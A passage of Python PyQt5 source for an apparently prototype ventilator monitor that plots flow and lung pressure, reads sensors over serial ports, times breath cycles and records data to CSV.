self.vent_time_widget_HL.setObjectName(\"vent_time_widget_HL\")\r\n self.vent_time_value = QtWidgets.QLabel(self.vent_time_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.vent_time_value.sizePolicy().hasHeightForWidth())\r\n self.vent_time_value.setSizePolicy(sizePolicy)\r\n self.vent_time_value.setMinimumSize(QtCore.QSize(0, 0))\r\n self.vent_time_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(44)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.vent_time_value.setFont(font)\r\n self.vent_time_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.vent_time_value.setObjectName(\"vent_time_value\")\r\n self.vent_time_widget_HL.addWidget(self.vent_time_value)\r\n self.record_button = QtWidgets.QPushButton(self.vent_time_widget)\r\n self.record_button.setEnabled(True)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.record_button.sizePolicy().hasHeightForWidth())\r\n self.record_button.setSizePolicy(sizePolicy)\r\n self.record_button.setMinimumSize(QtCore.QSize(50, 50))\r\n self.record_button.setMaximumSize(QtCore.QSize(40, 40))\r\n self.record_button.setStyleSheet(\"background-color: rgb(255, 0, 0);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius:25px;\\n\"\r\n \"\")\r\n self.record_button.setObjectName(\"record_button\")\r\n \r\n self.record_button.clicked.connect(\r\n partial(self.recordButtonClicked))\r\n \r\n self.vent_time_widget_HL.addWidget(self.record_button)\r\n self.time_widget_VL.addWidget(self.vent_time_widget)\r\n self.vent_time_label = QtWidgets.QLabel(self.time_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.vent_time_label.sizePolicy().hasHeightForWidth())\r\n self.vent_time_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.vent_time_label.setFont(font)\r\n self.vent_time_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.vent_time_label.setObjectName(\"vent_time_label\")\r\n self.time_widget_VL.addWidget(self.vent_time_label)\r\n self.stat_widget_HL.addWidget(self.time_widget)\r\n spacerItem7 = QtWidgets.QSpacerItem(\r\n 40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_widget_HL.addItem(spacerItem7)\r\n self.centralWidget_VL.addWidget(self.stat_widget)\r\n\r\n # Graph 1: Inspiratory Flow Rate\r\n def setupGraph1(self):\r\n self.graph1_widget = QtWidgets.QWidget(self.centralWidget)\r\n self.graph1_widget.setObjectName(\"graph1_widget\")\r\n self.graph1_widget_HL = QtWidgets.QHBoxLayout(\r\n self.graph1_widget)\r\n self.graph1_widget_HL.setObjectName(\"graph1_widget_HL\")\r\n self.graph1_label_widget = QtWidgets.QWidget(\r\n self.graph1_widget)\r\n\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph1_label_widget.sizePolicy().hasHeightForWidth())\r\n self.graph1_label_widget.setSizePolicy(sizePolicy)\r\n\r\n self.graph1_label_widget.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\")\r\n self.graph1_label_widget.setObjectName(\"graph1_label_widget\")\r\n self.graph1_label_widget_HL = QtWidgets.QHBoxLayout(\r\n self.graph1_label_widget)\r\n self.graph1_label_widget_HL.setObjectName(\r\n \"graph1_label_widget_HL\")\r\n spacerItem8 = QtWidgets.QSpacerItem(\r\n 8, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph1_label_widget_HL.addItem(spacerItem8)\r\n self.graph1_label = QtWidgets.QLabel(self.graph1_label_widget)\r\n\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph1_label.sizePolicy().hasHeightForWidth())\r\n self.graph1_label.setSizePolicy(sizePolicy)\r\n\r\n self.graph1_label.setMinimumSize(QtCore.QSize(75, 0))\r\n self.graph1_label.setMaximumSize(QtCore.QSize(75, 16777215))\r\n\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(20)\r\n font.setBold(True)\r\n font.setWeight(60)\r\n self.graph1_label.setFont(font)\r\n\r\n self.graph1_label.setAlignment(\r\n QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop)\r\n self.graph1_label.setObjectName(\"graph1_label\")\r\n self.graph1_label_widget_HL.addWidget(self.graph1_label)\r\n self.graph1_value_widget = QtWidgets.QWidget(\r\n self.graph1_label_widget)\r\n self.graph1_value_widget.setMinimumSize(QtCore.QSize(100, 0))\r\n self.graph1_value_widget.setObjectName(\"graph1_value_widget\")\r\n self.graph1_value_widget_VL = QtWidgets.QVBoxLayout(\r\n self.graph1_value_widget)\r\n self.graph1_value_widget_VL.setObjectName(\r\n \"graph1_value_widget_VL\")\r\n self.graph1_value = QtWidgets.QLabel(self.graph1_value_widget)\r\n\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph1_value.sizePolicy().hasHeightForWidth())\r\n self.graph1_value.setSizePolicy(sizePolicy)\r\n self.graph1_value.setMinimumSize(QtCore.QSize(200, 0))\r\n self.graph1_value.setMaximumSize(QtCore.QSize(200, 16777215))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(60)\r\n self.graph1_value.setFont(font)\r\n self.graph1_value.setAlignment(\r\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter)\r\n self.graph1_value.setObjectName(\"graph1_value\")\r\n self.graph1_value_widget_VL.addWidget(self.graph1_value)\r\n self.graph1_units = QtWidgets.QLabel(self.graph1_value_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph1_units.sizePolicy().hasHeightForWidth())\r\n self.graph1_units.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.graph1_units.setFont(font)\r\n self.graph1_units.setAlignment(\r\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter)\r\n self.graph1_units.setObjectName(\"graph1_units\")\r\n self.graph1_value_widget_VL.addWidget(self.graph1_units)\r\n self.graph1_label_widget_HL.addWidget(self.graph1_value_widget)\r\n spacerItem9 = QtWidgets.QSpacerItem(\r\n 8, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph1_label_widget_HL.addItem(spacerItem9)\r\n self.graph1_widget_HL.addWidget(self.graph1_label_widget)\r\n spacerItem10 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph1_widget_HL.addItem(spacerItem10)\r\n self.graph1_window = QtWidgets.QWidget(self.graph1_widget)\r\n self.graph1_window.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\")\r\n self.graph1_window.setObjectName(\"graph1_window\")\r\n self.graph1_window_HL = QtWidgets.QHBoxLayout(\r\n self.graph1_window)\r\n self.graph1_window_HL.setObjectName(\"graph1_window_HL\")\r\n\r\n self.graph1 = pg.PlotWidget()\r\n self.graph1.setObjectName(\"graph1\")\r\n self.graph1_x = [0] \r\n self.graph1_y = [0]\r\n self.graph1.setBackground((0, 0, 0, 0))\r\n pen = pg.mkPen(color=(5, 201, 133), width=3)\r\n self.graph1_data_line = self.graph1.plot(\r\n self.graph1_x, self.graph1_y, pen=pen)\r\n\r\n self.graph1_window_HL.addWidget(self.graph1)\r\n self.graph1_widget_HL.addWidget(self.graph1_window)\r\n self.centralWidget_VL.addWidget(self.graph1_widget)\r\n\r\n # Graph 2: Expiratory Flow Rate\r\n def setupGraph2(self):\r\n self.graph2_widget = QtWidgets.QWidget(self.centralWidget)\r\n self.graph2_widget.setObjectName(\"graph2_widget\")\r\n self.graph2_widget_HL = QtWidgets.QHBoxLayout(\r\n self.graph2_widget)\r\n self.graph2_widget_HL.setObjectName(\"graph2_widget_HL\")\r\n self.graph2_label_widget = QtWidgets.QWidget(\r\n self.graph2_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph2_label_widget.sizePolicy().hasHeightForWidth())\r\n self.graph2_label_widget.setSizePolicy(sizePolicy)\r\n self.graph2_label_widget.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\")\r\n self.graph2_label_widget.setObjectName(\"graph2_label_widget\")\r\n self.graph2_label_widget_HL = QtWidgets.QHBoxLayout(\r\n self.graph2_label_widget)\r\n self.graph2_label_widget_HL.setObjectName(\r\n \"graph2_label_widget_HL\")\r\n spacerItem11 = QtWidgets.QSpacerItem(\r\n 8, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph2_label_widget_HL.addItem(spacerItem11)\r\n self.graph2_label = QtWidgets.QLabel(self.graph2_label_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph2_label.sizePolicy().hasHeightForWidth())\r\n self.graph2_label.setSizePolicy(sizePolicy)\r\n self.graph2_label.setMinimumSize(QtCore.QSize(75, 0))\r\n self.graph2_label.setMaximumSize(QtCore.QSize(75, 16777215))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(20)\r\n font.setBold(True)\r\n font.setWeight(60)\r\n self.graph2_label.setFont(font)\r\n self.graph2_label.setAlignment(\r\n QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop)\r\n self.graph2_label.setObjectName(\"graph2_label\")\r\n self.graph2_label_widget_HL.addWidget(self.graph2_label)\r\n self.graph2_value_widget = QtWidgets.QWidget(\r\n self.graph2_label_widget)\r\n self.graph2_value_widget.setMinimumSize(QtCore.QSize(100, 0))\r\n self.graph2_value_widget.setObjectName(\"graph2_value_widget\")\r\n self.graph2_value_widget_VL = QtWidgets.QVBoxLayout(\r\n self.graph2_value_widget)\r\n self.graph2_value_widget_VL.setObjectName(\r\n \"graph2_value_widget_VL\")\r\n self.graph2_value = QtWidgets.QLabel(self.graph2_value_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph2_value.sizePolicy().hasHeightForWidth())\r\n self.graph2_value.setSizePolicy(sizePolicy)\r\n self.graph2_value.setMinimumSize(QtCore.QSize(200, 0))\r\n self.graph2_value.setMaximumSize(QtCore.QSize(200, 16777215))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(60)\r\n self.graph2_value.setFont(font)\r\n self.graph2_value.setAlignment(\r\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter)\r\n self.graph2_value.setObjectName(\"graph2_value\")\r\n self.graph2_value_widget_VL.addWidget(self.graph2_value)\r\n self.graph2_units = QtWidgets.QLabel(self.graph2_value_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph2_units.sizePolicy().hasHeightForWidth())\r\n self.graph2_units.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.graph2_units.setFont(font)\r\n self.graph2_units.setAlignment(\r\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter)\r\n self.graph2_units.setObjectName(\"graph2_units\")\r\n self.graph2_value_widget_VL.addWidget(self.graph2_units)\r\n self.graph2_label_widget_HL.addWidget(self.graph2_value_widget)\r\n spacerItem12 = QtWidgets.QSpacerItem(\r\n 8, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph2_label_widget_HL.addItem(spacerItem12)\r\n self.graph2_widget_HL.addWidget(self.graph2_label_widget)\r\n spacerItem13 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph2_widget_HL.addItem(spacerItem13)\r\n self.graph2_window = QtWidgets.QWidget(self.graph2_widget)\r\n self.graph2_window.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\\n\"\r\n \"\")\r\n self.graph2_window.setObjectName(\"graph2_window\")\r\n self.graph2_window_HL = QtWidgets.QHBoxLayout(\r\n self.graph2_window)\r\n self.graph2_window_HL.setObjectName(\"graph2_window_HL\")\r\n\r\n self.graph2 = pg.PlotWidget()\r\n self.graph2.setObjectName(\"graph2\")\r\n self.graph2_x = [0] # 100 time points\r\n self.graph2_y = [0] # 100 data points\r\n self.graph2.setBackground((0, 0, 0, 0))\r\n pen = pg.mkPen(color=(214, 106, 199), width=3)\r\n self.graph2_data_line = self.graph2.plot(\r\n self.graph2_x, self.graph2_y, pen=pen)\r\n\r\n self.graph2_window_HL.addWidget(self.graph2)\r\n self.graph2_widget_HL.addWidget(self.graph2_window)\r\n self.centralWidget_VL.addWidget(self.graph2_widget)\r\n\r\n # Graph 3: Lung Pressure\r\n def setupGraph3(self):\r\n self.graph3_widget = QtWidgets.QWidget(self.centralWidget)\r\n self.graph3_widget.setObjectName(\"graph3_widget\")\r\n self.graph3_widget_HL = QtWidgets.QHBoxLayout(\r\n self.graph3_widget)\r\n self.graph3_widget_HL.setObjectName(\"graph3_widget_HL\")\r\n self.graph3_label_widget = QtWidgets.QWidget(\r\n self.graph3_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph3_label_widget.sizePolicy().hasHeightForWidth())\r\n self.graph3_label_widget.setSizePolicy(sizePolicy)\r\n self.graph3_label_widget.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\")\r\n self.graph3_label_widget.setObjectName(\"graph3_label_widget\")\r\n self.graph3_label_widget_HL = QtWidgets.QHBoxLayout(\r\n self.graph3_label_widget)\r\n self.graph3_label_widget_HL.setObjectName(\r\n \"graph3_label_widget_HL\")\r\n spacerItem14 = QtWidgets.QSpacerItem(\r\n 8, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph3_label_widget_HL.addItem(spacerItem14)\r\n self.graph3_label = QtWidgets.QLabel(self.graph3_label_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph3_label.sizePolicy().hasHeightForWidth())\r\n self.graph3_label.setSizePolicy(sizePolicy)\r\n self.graph3_label.setMinimumSize(QtCore.QSize(75, 0))\r\n self.graph3_label.setMaximumSize(QtCore.QSize(75, 16777215))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(20)\r\n font.setBold(True)\r\n font.setWeight(60)\r\n self.graph3_label.setFont(font)\r\n self.graph3_label.setAlignment(\r\n QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop)\r\n self.graph3_label.setObjectName(\"graph3_label\")\r\n self.graph3_label_widget_HL.addWidget(self.graph3_label)\r\n self.graph3_value_widget = QtWidgets.QWidget(\r\n self.graph3_label_widget)\r\n self.graph3_value_widget.setMinimumSize(QtCore.QSize(100, 0))\r\n self.graph3_value_widget.setObjectName(\"graph3_value_widget\")\r\n self.graph3_value_widget_VL = QtWidgets.QVBoxLayout(\r\n self.graph3_value_widget)\r\n self.graph3_value_widget_VL.setObjectName(\r\n \"graph3_value_widget_VL\")\r\n self.graph3_value = QtWidgets.QLabel(self.graph3_value_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph3_value.sizePolicy().hasHeightForWidth())\r\n self.graph3_value.setSizePolicy(sizePolicy)\r\n self.graph3_value.setMinimumSize(QtCore.QSize(200, 0))\r\n self.graph3_value.setMaximumSize(QtCore.QSize(200, 16777215))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(60)\r\n self.graph3_value.setFont(font)\r\n self.graph3_value.setAlignment(\r\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter)\r\n self.graph3_value.setObjectName(\"graph3_value\")\r\n self.graph3_value_widget_VL.addWidget(self.graph3_value)\r\n self.graph3_units = QtWidgets.QLabel(self.graph3_value_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph3_units.sizePolicy().hasHeightForWidth())\r\n self.graph3_units.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.graph3_units.setFont(font)\r\n self.graph3_units.setAlignment(\r\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter)\r\n self.graph3_units.setObjectName(\"graph3_units\")\r\n self.graph3_value_widget_VL.addWidget(self.graph3_units)\r\n self.graph3_label_widget_HL.addWidget(self.graph3_value_widget)\r\n spacerItem15 = QtWidgets.QSpacerItem(\r\n 8, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph3_label_widget_HL.addItem(spacerItem15)\r\n self.graph3_widget_HL.addWidget(self.graph3_label_widget)\r\n spacerItem16 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph3_widget_HL.addItem(spacerItem16)\r\n self.graph3_window = QtWidgets.QWidget(self.graph3_widget)\r\n self.graph3_window.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\")\r\n self.graph3_window.setObjectName(\"graph3_window\")\r\n self.graph3_window_HL = QtWidgets.QHBoxLayout(\r\n self.graph3_window)\r\n self.graph3_window_HL.setObjectName(\"graph3_window_HL\")\r\n\r\n self.graph3 = pg.PlotWidget()\r\n self.graph3.setObjectName(\"graph3\")\r\n self.graph3_x = [0]\r\n self.graph3_y = [0]\r\n self.graph3.setBackground((0, 0, 0, 0))\r\n pen = pg.mkPen(color=(31, 148, 243), width=3)\r\n self.graph3_data_line = self.graph3.plot(\r\n self.graph3_x, self.graph3_y, pen=pen)\r\n\r\n self.graph3_window_HL.addWidget(self.graph3)\r\n self.graph3_widget_HL.addWidget(self.graph3_window)\r\n self.centralWidget_VL.addWidget(self.graph3_widget)\r\n\r\n ### SETUP DATA ACQUISITON SUBMETHODS ###\r\n \r\n def setupSerial(self):\r\n port1 = \"/dev/cu.wchusbserial14140\"\r\n port2 = \"/dev/cu.wchusbserial13\"\r\n\r\n # port1 = \"COM6\"\r\n # port2 = \"COM3\"\r\n try:\r\n self.ser1_sol = serial.Serial(port1, 115200, timeout=1)\r\n self.ser2 = serial.Serial(port2, 115200, timeout=1)\r\n except SerialException:\r\n print(\"Port not available\")\r\n\r\n def setupDataAcq(self):\r\n self.dataRefreshRate = 100\r\n self.ITV = 0\r\n self.ETV = 0\r\n self.PEEP = 0\r\n self.PIP = 0\r\n\r\n self.insFlowData_singleCycle = []\r\n self.expFlowData_singleCycle = []\r\n\r\n ### SETUP TIMER SUBMETHODS ###\r\n\r\n def setupDataTimer(self):\r\n self.dataRefreshRateTimer = QtCore.QTimer()\r\n self.dataRefreshRateTimer.setInterval(self.dataRefreshRate)\r\n self.dataRefreshRateTimer.timeout.connect(self.updateData)\r\n self.dataRefreshRateTimer.start()\r\n\r\n def setupBreathingTimer(self):\r\n self.E2I = 2 # Inspiration Time Interval (ratio)\r\n self.RR = 35 # Expiration Time Interval (rate)\r\n self.sPEEP = 2 # PEEP\r\n self.sPIP = 20 # PIP\r\n self.insPhase = True # Inspiration Phase Boolean\r\n\r\n self.breathCycleTimer = QtCore.QTimer()\r\n self.breathCycleTimer.setInterval(100)\r\n self.breathCycleTimer.timeout.connect(self.updateBreathCycle)\r\n self.breathCycleTimer.start()\r\n\r\n def setupClockRecordingTimer(self):\r\n self.isRecording = False\r\n self.ventTimer_s = 0\r\n self.ventTimer_data = 0\r\n self.perfCounter = 0\r\n\r\n self.updateClock()\r\n self.clockTimer = QtCore.QTimer()\r\n self.clockTimer.setInterval(1000)\r\n self.clockTimer.timeout.connect(self.updateClock)\r\n self.clockTimer.start()\r\n\r\n ### ACTION METHODS ###\r\n\r\n def E2I_button_clicked(self, isPos):\r\n self.E2I = self.E2I + ((-0.1 if not isPos and self.E2I > 0 else 0.1) * (0 if not isPos and self.E2I <= 0 else 1))\r\n _translate = QtCore.QCoreApplication.translate\r\n self.E2I = round((self.E2I),1)\r\n self.E2I_value.setText(_translate(\"MainWindow\", str(self.E2I)))\r\n\r\n def RR_button_clicked(self, isPos):\r\n self.RR = self.RR + ((-0.1 if not isPos and self.RR > 0 else 0.1) * (0 if not isPos and self.RR <= 0 else 1))\r\n _translate = QtCore.QCoreApplication.translate\r\n self.RR = round((self.RR),1)\r\n self.RR_value.setText(_translate(\"MainWindow\", str(self.RR)))\r\n\r\n def sPEEP_button_clicked(self, isPos):\r\n self.sPEEP = self.sPEEP + ((-0.1 if not isPos and self.sPEEP > 0 else 0.1) * (0 if not isPos and self.sPEEP <= 0 else 1))\r\n _translate = QtCore.QCoreApplication.translate\r\n self.sPEEP = round((self.sPEEP),1)\r\n self.sPEEP_value.setText(_translate(\"MainWindow\", str(self.sPEEP)))\r\n\r\n def sPIP_button_clicked(self, isPos):\r\n self.sPIP = self.sPIP + ((-0.1 if not isPos and self.sPIP > 0 else 0.1) * (0 if not isPos and self.sPIP <= 0 else 1))\r\n _translate = QtCore.QCoreApplication.translate\r\n self.sPIP = round((self.sPIP),1)\r\n self.sPIP_value.setText(_translate(\"MainWindow\", str(self.sPIP)))\r\n\r\n def recordButtonClicked(self):\r\n _translate = QtCore.QCoreApplication.translate\r\n self.isRecording = not self.isRecording\r\n\r\n if not self.isRecording:\r\n self.record_button.setText(_translate(\"MainWindow\", \"•\"))\r\n else:\r\n self.record_button.setText(_translate(\"MainWindow\", \"��\"))\r\n date = QDate.currentDate()\r\n dateValue = date.toString('yyyy-MM-dd')\r\n time = QTime.currentTime()\r\n timeValue = time.toString('hh-mm-ss')\r\n self.csvFilename = \"VentilatorRecording_\" + dateValue + \"_\" + timeValue + \".csv\"\r\n \r\n with open(self.csvFilename, 'w', newline='') as csvfile:\r\n dataWriter = csv.writer(csvfile)\r\n dataWriter.writerow([\"Time (s)\", \"Lung Pressure (mmHg)\", \"Inspiration Flow Rate (SLPM)\", \"Expiration Flow Rate (SLPM)\", \"FiO2 (%)\"])\r\n\r\n ### UPDATE METHODS ###\r\n\r\n def updateBreathCycle(self):\r\n _translate = QtCore.QCoreApplication.translate\r\n\r\n # NOTE!!!\r\n # E2I = E:I Ratio\r\n # RR = Respiratory Rate\r\n\r\n self.breathCycleTimer.setInterval(\r\n ((60/self.RR)*(self.E2I/(self.E2I+1))*1000) if self.insPhase else ((60/self.RR)*(1/(self.E2I+1))*1000))\r\n self.insPhase = not self.insPhase\r\n\r\n if not self.insPhase and self.insFlowData_singleCycle:\r\n self.ITV = mean(self.insFlowData_singleCycle) * 1000/60 * ((60/self.RR)*(1/(self.E2I+1)))\r\n print(f'Vt: {round(self.ITV,1)} | Max: {max(self.insFlowData_singleCycle)} | Mean {round(mean(self.insFlowData_singleCycle),1)}')\r\n \r\n self.insFlowData_singleCycle.clear()\r\n self.ITV_value.setText(_translate(\r\n \"MainWindow\", str(round(self.ITV))))\r\n elif self.insPhase and self.expFlowData_singleCycle:\r\n self.ETV = mean(self.expFlowData_singleCycle) * 1000/60 * ((60/self.RR)*(self.E2I/(self.E2I+1)))\r\n self.expFlowData_singleCycle.clear()\r\n self.ETV_value.setText(_translate(\r\n \"MainWindow\", str(round(self.ETV))))\r\n\r\n if self.insPhase:\r\n self.PIP = sys.float_info.min\r\n try:\r\n self.ser1_sol.write(b'i') # write to port\r\n except:\r\n pass\r\n else:\r\n self.PEEP = sys.float_info.max\r\n try:\r\n self.ser1_sol.write(b'e') # write to port\r\n except:\r\n pass\r\n\r\n self.PHASE_value.setText(_translate(\r\n \"MainWindow\", \"INS\" if self.insPhase else \"EXP\"))\r\n self.PHASE_value.setStyleSheet(\"color: rgb(5, 201, 133);\" if self.insPhase else \"color: rgb(214, 106, 199);\")\r\n self.PHASE_label.setStyleSheet(\"color: rgb(5, 201, 133);\" if self.insPhase else \"color: rgb(214, 106, 199);\")\r\n\r\n def updateData(self):\r\n _translate = QtCore.QCoreApplication.translate\r\n \r\n try:\r\n self.ser1_sol.write(b'g') # write to port\r\n expFlowPoint = float(self.ser1_sol.readline().decode('Ascii').rstrip(\"\\r\\n\"))\r\n O2_value = int(self.ser1_sol.readline().decode('Ascii').rstrip(\"\\r\\n\"))\r\n except:\r\n expFlowPoint = 0\r\n O2_value = 0\r\n\r\n try:\r\n self.ser2.write(b'g') # write to port\r\n insFlowPoint = float(self.ser2.readline().decode('Ascii').rstrip(\"\\r\\n\"))\r\n lungPrVal = int(self.ser2.readline().decode('Ascii').rstrip(\"\\r\\n\"))\r\n except:\r\n insFlowPoint = 0 \r\n lungPrVal = 0\r\n\r\n insFlowPoint = round(insFlowPoint, 1)\r\n expFlowPoint = round(expFlowPoint, 1)\r\n lungPrPoint = round(((((lungPrVal/1023) * 5) - 0.5) / 4) * 51.7149, 1)\r\n\r\n elapsedTime = time.perf_counter() - self.perfCounter\r\n self.perfCounter += elapsedTime\r\n\r\n # FiO2 (%)\r\n O2_value_str = str(round(((O2_value-204.6)/818.4)*100, 1)) + \"%\"\r\n self.O2_value.setText(_translate(\"MainWindow\", O2_value_str))\r\n\r\n # Graph 1: Inspiratory Flow\r\n if len(self.graph1_x) >= 100:\r\n self.graph1_x = self.graph1_x[1:] 